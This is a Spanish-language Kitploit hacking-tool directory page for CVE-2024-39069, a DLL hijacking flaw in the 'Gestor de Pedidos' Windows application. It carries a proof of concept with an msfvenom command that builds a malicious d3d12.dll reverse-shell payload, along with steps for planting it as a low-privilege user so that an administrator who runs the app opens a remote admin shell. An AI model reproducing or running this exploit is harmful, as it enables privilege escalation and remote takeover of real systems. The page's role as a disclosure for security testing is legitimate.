Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-39069 — CVE-2024-39069 | Kitploit
Herramientas/GitHubGitHub/aungsoepaing/cve-2024-39069
Escalada de PrivilegiosGeneración de PayloadsExplotaciónShellcodePruebas de PenetraciónExplotación de Binarios
GitHubaungsoepaing/cve-2024-39069

CVE-2024-39069

CVE-2024-39069

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Gestor de Pedidos 'Gestor de Peddios.exe' - Secuestro de DLL

Un atacante coloca una DLL maliciosa llamada "d3d12.dll" en un directorio que la aplicación busca antes de encontrar la DLL legítima "d3d12.dll". Cuando se ejecuta la aplicación, carga la DLL maliciosa en lugar de la legítima, permitiendo al atacante ejecutar código arbitrario en el contexto de la aplicación.

Página del proveedor: https://gestordepedidos.ifood.com.br/

Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

Video de prueba de concepto: https://youtu.be/oMIobV2M0T8

POC

  1. Crear un archivo DLL malicioso en Kali Linux con msfvenom

    root@kitploit:~
    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. Transferir el 'd3d12.dll' creado al host Windows desde Kali con acceso de usuario de bajo nivel

  3. Mover el archivo 'd3d12.dll' creado a 'C:\Gestor de Peddios\d3d12.dll' con acceso de usuario de bajo nivel

  4. Cuando el administrador ejecute la aplicación, obtendrá una shell inversa como administrador

Descargar herramienta